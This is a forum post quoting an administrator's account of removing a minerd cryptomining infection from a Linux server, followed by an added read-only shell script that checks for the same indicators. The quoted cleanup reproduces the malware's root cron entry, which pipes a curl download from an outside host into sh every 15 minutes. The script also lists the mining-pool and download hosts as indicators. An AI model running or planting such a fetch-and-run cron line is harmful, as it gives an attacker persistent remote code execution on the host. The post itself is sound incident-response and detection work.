This post was last edited by RE_HASH on 2016-07-16 21:37
The post from the other site:
I found the solution to removing minerd. I was lucky enough to find the actual script that was used to infect my server. All I had to do was remove the elements placed by this script -
On monkeyoto's suggestion, I blocked all communication with the mining pool server - iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
Removed the cron */15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0706 | sh from /var/spool/cron/root and /var/spool/cron/crontabs/root.
Removed the directory /opt/yam.
Removed /root/.ssh/KHK75NEOiq.
Deleted the files /opt/minerd and /opt/KHK75NEOiq33.
Stopped the minerd process - pkill minerd.
Stopped lady - service lady stop.
I ran ps -eo pcpu,args --sort=-%cpu | head, top -bn2 |sed -n '7,25'p and ps aux | grep minerd after that and the malware was nowhere to be seen.
I still need to figure out how it gained access into the system but I was able to disable it this way.
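The quoted post lists its indicators (the pool and download hosts, the cron entry, the dropped files and the process names) mixed in with the cleanup commands. The script below is an added example, not part of the quoted post: a read-only audit that checks a host for exactly those indicators and reports them without deleting or killing anything, so it can be run first to confirm what is present before cleanup and again afterwards to confirm the cleanup worked. The indicator values come from the post; the function names, the variable names and the assumption that the `lady` service shows up as a process called `lady` are mine.

```shell
#!/bin/sh
# Added example (not from the quoted post): read-only audit for the minerd
# indicators the post describes. Indicator values come from the post; the
# function and variable names are this example's own.

IOC_HOSTS="xmr.crypto-pool.fr r.chanstring.com"
IOC_PATHS="/opt/yam /opt/minerd /opt/KHK75NEOiq33 /root/.ssh/KHK75NEOiq"
IOC_PROCS="minerd lady"      # "lady" as a process name is an assumption
CRON_FILES="/var/spool/cron/root /var/spool/cron/crontabs/root"

# scan_cron_text: reads crontab lines on stdin and prints each line that
# references one of the indicator hosts. Returns 0 if at least one line hit,
# 1 if the input was clean.
scan_cron_text() {
    hits=0
    while IFS= read -r line; do
        for host in $IOC_HOSTS; do
            case "$line" in
                *"$host"*)
                    printf 'SUSPICIOUS CRON ENTRY: %s\n' "$line"
                    hits=$((hits + 1))
                    ;;
            esac
        done
    done
    [ "$hits" -gt 0 ]
}

# check_paths: prints every indicator path that exists on disk.
# Returns 0 if any exist, 1 if none do.
check_paths() {
    present=0
    for p in $IOC_PATHS; do
        if [ -e "$p" ]; then
            printf 'INDICATOR PRESENT: %s\n' "$p"
            present=$((present + 1))
        fi
    done
    [ "$present" -gt 0 ]
}

# check_procs: looks for the indicator process names in the process table,
# matching on the command basename so a path prefix does not hide a hit.
# Returns 0 if any are running, 1 otherwise.
check_procs() {
    running=0
    for name in $IOC_PROCS; do
        if ps -eo args 2>/dev/null | grep -v grep | grep -Eq "(^|/)$name( |\$)"; then
            printf 'PROCESS RUNNING: %s\n' "$name"
            running=$((running + 1))
        fi
    done
    [ "$running" -gt 0 ]
}

# audit_host: runs all three checks against the live system.
# Returns 0 if anything was found, 1 if the host looks clean.
audit_host() {
    status=1
    for f in $CRON_FILES; do
        [ -r "$f" ] && scan_cron_text < "$f" && status=0
    done
    check_paths && status=0
    check_procs && status=0
    return $status
}

# Run the full audit only when asked, so the file can also be sourced for its
# functions (e.g. to scan a saved crontab copy with scan_cron_text).
if [ "${1:-}" = "--audit" ]; then
    if audit_host; then
        echo "indicators found: review the lines above"
    else
        echo "no indicators from the post found on this host"
    fi
fi
```

Run it as root with `sh audit.sh --audit`; a hit in the cron check is the one that matters most, since the post's cron line re-downloads and re-executes the payload every 15 minutes and would undo the rest of the cleanup if it were left behind.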